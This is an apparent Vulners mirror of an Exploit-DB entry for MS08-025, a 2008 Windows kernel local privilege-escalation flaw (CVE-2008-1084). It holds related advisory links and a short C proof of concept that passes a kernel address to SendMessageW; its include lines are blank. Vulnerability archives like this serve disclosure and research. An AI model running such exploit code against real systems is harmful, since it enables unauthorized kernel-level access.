Lucene search
+L

Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)

🗓️ 08 Apr 2008 00:00:00Reported by WhitecellType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Microsoft Windows Local Privilege Escalation Vulnerability. Kernel-level access exploit.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-1084
8 Apr 200800:00
circl
cve
CVE
CVE-2008-1084
8 Apr 200823:00
cve
cvelist
Cvelist
CVE-2008-1084
8 Apr 200823:00
cvelist
exploitdb
Exploit DB
Microsoft Windows XP SP2 - 'win32k.sys' Local Privilege Escalation (MS08-025)
28 Apr 200800:00
exploitdb
euvd
EUVD
EUVD-2008-1095
7 Oct 202500:30
euvd
canvas
canvas
Immunity Canvas: MS08_025
8 Apr 200823:05
canvas
nvd
NVD
CVE-2008-1084
8 Apr 200823:05
nvd
openvas
OpenVAS
Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693)
10 Jan 201100:00
openvas
openvas
OpenVAS
Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693)
10 Jan 201100:00
openvas
prion
Prion
Input validation
8 Apr 200823:05
prion
Rows per page
/*
source: https://www.securityfocus.com/bid/28554/info

Microsoft Windows is prone to a local privilege-escalation vulnerability.

The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.
*/


#include
#include

int main(int argc,char *argv[])
{
    DWORD    dwHookAddress = 0x80000000;

    printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" );
        printf( "Create by Whitecell's [email protected] 2008/04/10\n" );

    SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );
    return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.06753
32